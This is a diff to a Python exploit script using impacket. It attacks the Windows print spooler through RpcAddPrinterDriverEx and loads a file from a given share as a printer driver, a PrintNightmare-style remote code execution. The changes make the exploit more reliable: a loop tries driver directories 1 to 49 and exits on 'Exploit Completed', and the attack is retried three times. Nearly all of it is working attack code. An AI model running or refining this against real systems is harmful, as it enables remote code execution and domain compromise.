|
|
|
@ -3,7 +3,7 @@ from impacket.dcerpc.v5 import rprn |
|
|
|
|
from impacket.dcerpc.v5 import transport |
|
|
|
|
import argparse |
|
|
|
|
import sys |
|
|
|
|
|
|
|
|
|
import time |
|
|
|
|
|
|
|
|
|
def connect(username, password, domain, lmhash, nthash, address, port): |
|
|
|
|
binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address) |
|
|
|
@ -50,29 +50,19 @@ def main(username, password, domain, lmhash, nthash, address, port, share): |
|
|
|
|
|
|
|
|
|
print("[*] Uploading {0}".format(share)) |
|
|
|
|
|
|
|
|
|
#stage 0 |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
print("[*] Stage0: {0}".format(resp['ErrorCode'])) |
|
|
|
|
|
|
|
|
|
#stage 1 |
|
|
|
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\{0}\x00".format(filename) |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
print("[*] Stage1: {0}".format(resp['ErrorCode'])) |
|
|
|
|
|
|
|
|
|
#stage 2 |
|
|
|
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\2\\{0}\x00".format(filename) |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
print("[*] Stage2: {0}".format(resp['ErrorCode'])) |
|
|
|
|
|
|
|
|
|
#stage 3 |
|
|
|
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\3\\{0}\x00".format(filename) |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
print("[*] Stage3: {0}".format(resp['ErrorCode'])) |
|
|
|
|
|
|
|
|
|
if (resp['ErrorCode'] == 0): |
|
|
|
|
print("[+] Exploit Completed") |
|
|
|
|
else: |
|
|
|
|
print("[-] Not Completed") |
|
|
|
|
for i in range(1, 50): |
|
|
|
|
try: |
|
|
|
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
print("[*] Stage{0}: {1}".format(i, resp['ErrorCode'])) |
|
|
|
|
if (resp['ErrorCode'] == 0): |
|
|
|
|
print("[+] Exploit Completed") |
|
|
|
|
sys.exit() |
|
|
|
|
except Exception as e: |
|
|
|
|
#print(e) |
|
|
|
|
pass |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == '__main__': |
|
|
|
@ -122,5 +112,12 @@ Example; |
|
|
|
|
lmhash = '' |
|
|
|
|
nthash = '' |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#re-run if stage0/stageX fails |
|
|
|
|
print("[*] Try 1...") |
|
|
|
|
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) |
|
|
|
|
time.sleep(10) |
|
|
|
|
print("[*] Try 2...") |
|
|
|
|
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) |
|
|
|
|
time.sleep(10) |
|
|
|
|
print("[*] Try 3...") |
|
|
|
|
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share) |